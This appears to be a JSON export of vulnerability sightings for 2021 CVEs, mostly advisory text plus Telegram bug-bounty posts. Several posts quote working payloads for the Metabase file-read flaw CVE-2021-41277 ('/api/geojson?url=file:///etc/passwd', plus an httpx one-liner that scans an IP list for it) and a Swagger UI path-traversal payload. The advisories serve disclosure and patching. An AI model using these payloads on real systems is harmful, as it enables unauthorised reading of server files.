Starting with versions 4.4.34 and 5.3.12, Symfony now follows the OWASP recommendations and uses the single quote `'` to prefix formulas and add the prefix to cells starting by `\\t`, `\\r` as well as `=`, `+`, `-` and `@`.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-11-24T22:27:41.000000Z"}, {"uuid": "902a8773-da02-41b1-986a-009b58fee6fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41272", "type": "seen", "source": "https://t.me/cibsecurity/33892", "content": "\u203c CVE-2021-41272 \u203c\n\nBesu is an Ethereum client written in Java. Starting in version 21.10.0, changes in the implementation of the SHL, SHR, and SAR operations resulted in the introduction of a signed type coercion error in values that represent negative values for 32 bit signed integers. Smart contracts that ask for shifts between approximately 2 billion and 4 billion bits (nonsensical but valid values for the operation) will fail to execute and hence fail to validate. In networks where vulnerable versions are mining with other clients or non-vulnerable versions this will result in a fork and the relevant transactions will not be included in the fork. In networks where vulnerable versions are not mining (such as Rinkeby) no fork will result and the validator nodes will stop accepting blocks. In networks where only vulnerable versions are mining the relevant transaction will not be included in any blocks. When the network adds a non-vulnerable version the network will act as in the first case. Besu 21.10.2 contains a patch for this issue. Besu 21.7.4 is not vulnerable and clients can roll back to that version. 
There is a workaround available: Once a transaction with the relevant shift operations is included in the canonical chain, the only remediation is to make sure all nodes are on non-vulnerable versions.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-12-14T00:13:33.000000Z"}, {"uuid": "2c96067a-0fee-4d3e-b86b-0768cda461df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41279", "type": "seen", "source": "https://t.me/cibsecurity/32999", "content": "\u203c CVE-2021-41279 \u203c\n\nBaserCMS is an open source content management system with a focus on Japanese language support. In affected versions users with upload privilege may upload crafted zip files capable of path traversal on the host operating system. This is a vulnerability that needs to be addressed when the management system is used by an unspecified number of users. If you are eligible, please update to the new version as soon as possible.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-11-26T20:29:51.000000Z"}, {"uuid": "f0131695-cdc5-480e-8dd0-1faf12303538", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41278", "type": "seen", "source": "https://t.me/cibsecurity/32669", "content": "\u203c CVE-2021-41278 \u203c\n\nFunctions SDK for EdgeX is meant to provide all the plumbing necessary for developers to get started in processing/transforming/exporting data out of the EdgeX IoT platform. In affected versions broken encryption in app-functions-sdk \u201cAES\u201d transform in EdgeX Foundry releases prior to Jakarta allows attackers to decrypt messages via unspecified vectors. 
The app-functions-sdk exports an \u201caes\u201d transform that user scripts can optionally call to encrypt data in the processing pipeline. No decrypt function is provided. Encryption is not enabled by default, but if used, the level of protection may be less than the user may expects due to a broken implementation. Version v2.1.0 (EdgeX Foundry Jakarta release and later) of app-functions-sdk-go/v2 deprecates the \u201caes\u201d transform and provides an improved \u201caes256\u201d transform in its place. The broken implementation will remain in a deprecated state until it is removed in the next EdgeX major release to avoid breakage of existing software that depends on the broken implementation. As the broken transform is a library function that is not invoked by default, users who do not use the AES transform in their processing pipelines are unaffected. Those that are affected are urged to upgrade to the Jakarta EdgeX release and modify processing pipelines to use the new \"aes256\" transform.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-11-19T02:16:10.000000Z"}, {"uuid": "c50d1a47-d8c7-4ce4-8e0f-0f3202ae03a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "https://t.me/cibsecurity/32567", "content": "\u203c CVE-2021-41277 \u203c\n\nMetabase is an open source data analytics platform. In affected versions a security issue has been discovered with the custom GeoJSON map (`admin-&gt;settings-&gt;maps-&gt;custom maps-&gt;add a map`) support and potential local file inclusion (including environment variables). URLs were not validated prior to being loaded. This issue is fixed in a new maintenance release (0.40.5 and 1.40.5), and any subsequent release after that. 
If you\u2019re unable to upgrade immediately, you can mitigate this by including rules in your reverse proxy or load balancer or WAF to provide a validation filter before the application.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-11-17T22:20:55.000000Z"}, {"uuid": "50f61aee-5dd6-4cc4-9e68-622d3f5370ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41275", "type": "published-proof-of-concept", "source": "https://t.me/cibsecurity/32557", "content": "\u203c CVE-2021-41275 \u203c\n\nspree_auth_devise is an open source library which provides authentication and authorization services for use with the Spree storefront framework by using an underlying Devise authentication framework. In affected versions spree_auth_devise is subject to a CSRF vulnerability that allows user account takeover. All applications using any version of the frontend component of spree_auth_devise are affected if protect_from_forgery method is both: Executed whether as: A before_action callback (the default). A prepend_before_action (option prepend: true given) before the :load_object hook in Spree::UserController (most likely order to find). Configured to use :null_session or :reset_session strategies (:null_session is the default in case the no strategy is given, but rails --new generated skeleton use :exception). Users are advised to update their spree_auth_devise gem. For users unable to update it may be possible to change your strategy to :exception. Please see the linked GHSA for more workaround details. ### Impact CSRF vulnerability that allows user account takeover. 
All applications using any version of the frontend component of `spree_auth_devise` are affected if `protect_from_forgery` method is both: * Executed whether as: * A before_action callback (the default) * A prepend_before_action (option prepend: true given) before the :load_object hook in Spree::UserController (most likely order to find). * Configured to use :null_session or :reset_session strategies (:null_session is the default in case the no strategy is given, but rails --new generated skeleton use :exception). That means that applications that haven't been configured differently from what it's generated with Rails aren't affected. Thanks @waiting-for-dev for reporting and providing a patch ? ### Patches Spree 4.3 users should update to spree_auth_devise 4.4.1 Spree 4.2 users should update to spree_auth_devise 4.2.1 ### Workarounds If possible, change your strategy to :exception: ```ruby class ApplicationController &lt; ActionController::Base protect_from_forgery with: :exception end ``` Add the following to`config/application.rb `to at least run the `:exception` strategy on the affected controller: ```ruby config.after_initialize do Spree::UsersController.protect_from_forgery with: :exception end ``` ### References https://github.com/solidusio/solidus_auth_devise/security/advisories/GHSA-xm34-v85h-9pg2\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-11-17T22:15:07.000000Z"}, {"uuid": "9c4e1a8e-115d-4fde-9d65-de7052f1543f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41274", "type": "seen", "source": "https://t.me/cibsecurity/32543", "content": "\u203c CVE-2021-41274 \u203c\n\nsolidus_auth_devise provides authentication services for the Solidus webstore framework, using the Devise gem. In affected versions solidus_auth_devise is subject to a CSRF vulnerability that allows user account takeover. 
All applications using any version of the frontend component of `solidus_auth_devise` are affected if `protect_from_forgery` method is both: Executed whether as: A `before_action` callback (the default) or A `prepend_before_action` (option `prepend: true` given) before the `:load_object` hook in `Spree::UserController` (most likely order to find). Configured to use `:null_session` or `:reset_session` strategies (`:null_session` is the default in case the no strategy is given, but `rails --new` generated skeleton use `:exception`). Users should promptly update to `solidus_auth_devise` version `2.5.4`. Users unable to update should if possible, change their strategy to `:exception`. Please see the linked GHSA for more workaround details.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-11-17T22:14:48.000000Z"}, {"uuid": "4cf6cf57-8033-4570-ad74-f386e6f5428c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41271", "type": "seen", "source": "https://t.me/cibsecurity/32467", "content": "\u203c CVE-2021-41271 \u203c\n\nDiscourse is a platform for community discussion. In affected versions a maliciously crafted request could cause an error response to be cached by intermediate proxies. This could cause a loss of confidentiality for some content. 
This issue is patched in the latest stable, beta and tests-passed versions of Discourse.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-11-17T16:20:35.000000Z"}, {"uuid": "3821b76d-e1b8-4860-80f0-bade290c1829", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-05-17)", "content": "", "creation_timestamp": "2026-05-17T00:00:00.000000Z"}, {"uuid": "cc71c2b6-7aa8-43cb-8951-d5f57e9db11d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/1642", "content": "#CVE-2021\n\nIt is a nmap script for metabase vulnerability (CVE-2021-41277)\n\nhttps://github.com/frknktlca/Metabase_Nmap_Script\n\n@BlueRedTeam", "creation_timestamp": "2022-01-19T18:55:18.000000Z"}, {"uuid": "2d2b51fb-c371-40db-99c4-b18bb59a5586", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/4802", "content": "#exploit\nCVE-2021-41277:\nMetaBase Arbitrary File Read\nhttps://github.com/0x0021h/expbox/blob/main/CVE-2021-41277.yaml", "creation_timestamp": "2021-11-21T13:45:01.000000Z"}, {"uuid": "ad5a6427-0605-4c1c-bb7c-d8e60321dece", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/4889", "content": "#Analytics\nTop 10 Most Used Vulns of the Month (Nov 1-30)\nCVE-2021-22205 - GitLab CE/EE 
RCE\nhttps://t.me/cybersecuritytechnologies/4602\nCVE-2021-30883 - iOS IOMFB Vuln\nhttps://t.me/cybersecuritytechnologies/4497\nCVE-2021-3064 - Memory Corruption in PAN-OS GlobalProtect Portal/Gateway Interfaces\nhttps://t.me/cybersecuritytechnologies/4724\nCVE-2021-41379 - Windows Installer LPE\nhttps://t.me/cybersecuritytechnologies/4813\nCVE-2021-42321 - MS Exchange Post-Auth RCE\nhttps://t.me/cybersecuritytechnologies/4809\nCVE-2021-40539 - Zoho ManageEngine Auth. Bypass\nhttps://t.me/cybersecuritytechnologies/4718\nCVE-2021-41277 - MetaBase Arbitrary File Read\nhttps://t.me/cybersecuritytechnologies/4802\nCVE-2021-43267 - Remote Kernel Heap Overflow in TIPC\nhttps://t.me/cybersecuritytechnologies/4678\nCVE-2021-42574 - Unicode Bidirectional override vuln\nhttps://github.com/js-on/CVE-2021-42574\nhttps://github.com/pierDipi/unicode-control-characters-action\nCVE-2021-24084 - Windows MDM LPE\nhttps://t.me/cybersecuritytechnologies/4850", "creation_timestamp": "2021-12-03T11:00:35.000000Z"}, {"uuid": "57f6ac9f-112f-4fa7-8b0f-301405828969", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-05-09)", "content": "", "creation_timestamp": "2026-05-09T00:00:00.000000Z"}, {"uuid": "7ae0a2df-eda6-4487-bcdf-b4bfefb6ec1a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "https://t.me/bhhub/641", "content": "#BugBountyTips of the Day\nNew Feature Alert \ud83d\udea8  [ --SQLi ] Support #MySQL mod_Security &amp; libinjection bypass [** New **]  Have a look :  https://t.co/9ZLO4pJsuG  $ bash  https://t.co/oGQuTKBBAs -u  https://domain.tld/secret --SQLi #bugbountytips #bugbountytip #bugbounty #infosec #cloud #cybersecurity  
https://t.co/RKjXMaF2tw\n---\n#BugBounty #bugbountytip #infosec - Do you want to get all subdomains of a host, get the open ports of all of them (using IP address deduplication), and check if there's an HTTP service running? Use the set of tools included in the screenshot! Links in the comments.  https://t.co/qC0FVQCDzA\n---\nPassword reset token was getting leaked in the forgot password Request itself as well as on other endpoint '/verify/'. 2x bounty.@SynackRedTeam #bugbountytips  https://t.co/UYOEXKPAve\n---\nBest of YouTube Channels for Pentester (Part 3)   https://t.co/70lBKdBw16  https://t.co/cRhoJ6D0fC  https://t.co/IeZHpjoDjR  https://t.co/qQRG02wVHv  @rot169 @0xConda @rana__khalil @NahamSec #infosec #cybersecurity #pentesting #oscp #bugbounty\n---\nEl Curso Virtual de Hacking con Kali Linux est\u00e1 disponible en video. #hacking #cybersecurity #bugbounty #osint #forensics \u2623 \u2705 M\u00e1s informaci\u00f3n en:  https://t.co/lsfm4jifRQ  https://t.co/pyXzMnVOyv\n---\nBest of Web Penetration Testing (Part 4)  Credit @trbughunters   #infosec #cybersecurity #pentesting #ctf #oscp #windows #cheatsheet #redteaming #burpsuite #bugbounty #bugbountytip4  https://t.co/6bPVxzGUTI\n---\nSmall to medium size businesses are using WordPress, Learn how to recon and hack WordPress websites in a legal penetration testing environment. 
#bugbountytips #infosec  https://t.co/QpGPHxs7H6\n---\nAPI Security Checklist\ud83d\udd25   https://t.co/7tW3yfUsEy  #bugbounty #bugbountytips #apisecurity #apipentesting #checklist\n---\nCVE-2021-41277 MetaBase Arbitrary File Read  MetaBase &lt; 0.40.5 1.0.0 &lt;= MetaBase &lt; 1.40.5   https://t.co/TtJHu6lvr1  PoC: GET /api/geojson?url=file:/etc/passwd HTTP/1.1  #CVE #BugBounty #bugbountytips #infosec #vulnerable", "creation_timestamp": "2021-11-22T13:37:04.000000Z"}, {"uuid": "5b54b1f6-6038-4c88-9bfe-13ea18bd2e0b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "https://t.me/bhhub/644", "content": "#BugBountyTips of the Day\nYay, I was awarded a $7,500 bounty on @Hacker0x01 !  https://t.co/omBwPCLeT7 #TogetherWeHitHarder with @naglinagli   @YahooSecurity and @TheParanoids  once again show why they can be the best program to hack on, and are one of the most fair programs around.  #BugBounty\n---\nLFI in #SwaggerUI   #bugbountytips   #bugbountytip  add this payload for your LFI word list   /v1/docs//..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\/etc/passwd HTTP/1.1  #NOTE its not working from browser  https://t.co/RKUhGwEmSZ\n---\nBest of SSRF Cheatsheet  Credit @d0nut  #infosec #cybersecurity #pentesting #oscp #cheatsheet #burpsuite #bugbounty #bugbountytips #ssrf #vulnerabilities  https://t.co/4orqpOIEIQ\n---\n#bugbountytips #bugbounty #CVE-2021-41277 Metabase Custom GeoJSON Map file inclusion    https://domain/api/geojson?url=file:///etc/passwd   httpx -l IPlist.txt -follow-redirects -title -path /api/geojson?url=file:///etc/passwd -match-string \"root:x:0:0\"  https://t.co/TnXoIpVvfd\n---\nI am predicting this to be an excellent #book to add to your 2022 list for #webapp #security and #bugbounty hunting. 
Thank you Corey Ball for sharing your knowledge on this important topic!  #infosec #recon #pentest #api #bugbountytips #websecurity   https://t.co/BVFL57rKx1", "creation_timestamp": "2021-11-23T13:37:04.000000Z"}, {"uuid": "899437f7-bd1c-48fb-bd3d-49f22fe9a9f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "https://t.me/bhhub/640", "content": "#BugBountyTips of the Day\nFew months ago i was awarded $10,000 from microsoft for finding a security vulnerability on their web application. now the bug has been patched and got the acknowledgment on their HOF :)  #bugbounty #cybersecurity #news #microsoft #ethicalhacking #bugbountytips #bounty  https://t.co/BCCG7TzP8w\n---\nRed Team Toolkit \ud83e\uddf0 - An Open-Source Django Offensive Web-App that contains useful offensive tools used in the red-teaming activity.  \u00bb  https://t.co/nl4OewP3f5  #cybersecurity #infosec #security  #cyber #informationsecurity #redteam #redteaming #bugbounty #bugbountytips  https://t.co/3ZEmmOSpyo\n---\nJust published a write-up on Account Takeover due to OAuth Misconfiguration + CSRF + XSS and Weak CSP.    https://t.co/lslyFhDmbF  #Pentesting #hacking #cybersecurity #infosec #bugbounty #bugbountytips\n---\nReally excited for this Precious gift from GoogleVRP team.   Thanks for selecting me.  
#infosec #googlevrp #bugbounty  https://t.co/jVFi2IxgMG\n---\nBest of Web Penetration Testing  Credit @sec_r0   #infosec #cybersecurity #pentesting #ctf #oscp #windows #cheatsheet #redteaming #burpsuite #bugbounty #bugbountytips  https://t.co/nPepuxs3WR\n---\nBest of Web Penetration Testing   Credit @sec_r0  #infosec #cybersecurity #pentesting #ctf #oscp #windows #cheatsheet #redteaming #burpsuite #bugbounty #bugbountytips  https://t.co/jq1DnJ34gl\n---\nThere are more than 17k publicly accessible Metabase instances on shodan and few BB programs that were affected as well, the fix is super easy for  CVE-2021-41277 and the impact is CRITICAL, so I'd advise patching quickly  : )  #bugbounty  https://t.co/FPQTir4bE2\n---\nwhich wordlist you use for subdomain brute !!!  #bugbountydiscussion #bugbounty #infosec\n---\nI've pushed a nuclei template to detect this misconfiguration An unauthenticated api endpoint requiring a URL parameter, with insufficient validation that lead to LFI. ( CVE-2021-41277 ).   
https://t.co/shrTv2gr85  Source :  https://t.co/ByzKbMFX8m  #bugbounty #bugbountytips 1/2  https://t.co/r72gDHNYWt\n---\nBest of Web Penetration Testing (Part 3)  Credit @hackerscrolls   #infosec #cybersecurity #pentesting #ctf #oscp #windows #cheatsheet #redteaming #burpsuite #bugbounty #bugbountytips  https://t.co/1WuKhFEXMa", "creation_timestamp": "2021-11-21T13:37:04.000000Z"}, {"uuid": "e2c692ef-2512-44c0-928d-96f084ffa428", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-05-29)", "content": "", "creation_timestamp": "2026-05-29T00:00:00.000000Z"}, {"uuid": "2e2019dd-2c10-422c-84bc-0f33d2c47870", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-05-18)", "content": "", "creation_timestamp": "2026-05-18T00:00:00.000000Z"}]}